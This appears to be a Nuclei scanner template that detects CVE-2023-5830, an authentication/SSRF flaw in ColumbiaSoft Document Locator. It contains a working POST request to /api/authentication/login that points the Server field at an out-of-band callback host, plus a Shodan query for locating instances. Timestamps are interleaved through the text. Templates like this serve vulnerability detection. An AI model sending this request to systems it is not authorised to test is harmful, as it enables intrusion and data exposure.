2024-03-17 05:11:15 +00:00
id : CVE-2023-5830
2024-03-18 05:41:38 +00:00
2024-03-17 05:11:15 +00:00
info :
name : ColumbiaSoft DocumentLocator - Improper Authentication
author : Gonski
severity : critical
2024-03-18 05:41:38 +00:00
description : |
Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login.
2024-03-17 05:11:15 +00:00
impact : |
An attacker could exploit this vulnerability to gain unauthorized access to sensitive information.
remediation : |
Upgrade to a patched version of ColumbiaSoft DocumentLocator to fix the improper authentication issue.
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2023-5830
- https://vuldb.com/?ctiid.243729
- https://github.com/advisories/GHSA-j89v-wm7x-4434
- https://vuldb.com/?id.243729
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2023-5830
cwe-id : CWE-287
epss-score : 0.00091
2024-03-18 05:41:38 +00:00
epss-percentile : 0.37579
2024-03-17 05:11:15 +00:00
cpe : cpe:2.3:a:documentlocator:document_locator:*:*:*:*:*:*:*:*
metadata :
max-request : 1
vendor : documentlocator
product : document_locator
shodan-query : 'title:"Document Locator - WebTools"'
tags : cve,cve2023,ssrf,unauth,columbiasoft,intrusive,webtools
http :
- raw :
- |
2024-03-18 05:41:38 +00:00
@timeout : 20s
2024-03-17 05:11:15 +00:00
POST /api/authentication/login HTTP/1.1
Host : {{Hostname}}
Content-Type : application/json;charset=UTF-8
Origin : {{BaseURL}}
Referer : {{BaseURL}}
{
"LoginType" : "differentWindows" ,
"User" : "{{randstr}}" ,
"Password" : "{{rand_base(5, " abc")}}",
"Domain" : "{{randstr}}" ,
"Server" : "{{interactsh-url}}" ,
"Repository" : "{{randstr}}"
}
matchers-condition : and
matchers :
- type : word
part : interactsh_protocol
words :
- "dns"
- type : word
part : body
words :
- '"Authorized":false'